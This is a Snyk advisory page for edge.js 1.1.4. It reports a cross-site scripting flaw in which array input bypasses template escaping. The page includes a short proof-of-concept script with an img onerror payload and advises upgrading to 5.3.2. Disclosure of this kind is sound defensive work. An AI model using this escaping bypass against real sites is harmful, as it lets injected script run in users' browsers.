Homepage
About Snyk

edge.js@1.1.4 vulnerabilities

Template engine

Go back to all versions of this package
Report a new vulnerability Found a mistake?

Direct Vulnerabilities

Known vulnerabilities in the edge.js package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • M
Cross-site Scripting (XSS)

edge.js is a Node.js templating engine with fresh air.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS). A type confusion vulnerability can be used to bypass input sanitization when the input to be rendered is an array (instead of a string or a SafeValue), even if {{ }} are used.

PoC

- create the following file (welcome.edge) under the views folder:
<p> {{ greeting }} </p>

- run the following code:
const { join } = require('path')

const edge = require('edge.js').default

edge.mount(join(__dirname, 'views'))

edge.render('welcome', {
  greeting: "<img src=x onerror='alert(1)' />"
}).then(html => console.log(html)) // <p> &lt;img src=x onerror=&#x27;alert(1)&#x27; /&gt; </p>

edge.render('welcome', {
    greeting: ["<img src=x onerror='alert(2)' />"]
  }).then(html => console.log(html)) // <p> <img src=x onerror='alert(2)' /> </p>

How to fix Cross-site Scripting (XSS)?

Upgrade edge.js to version 5.3.2 or higher.

<5.3.2
Go back to all versions of this package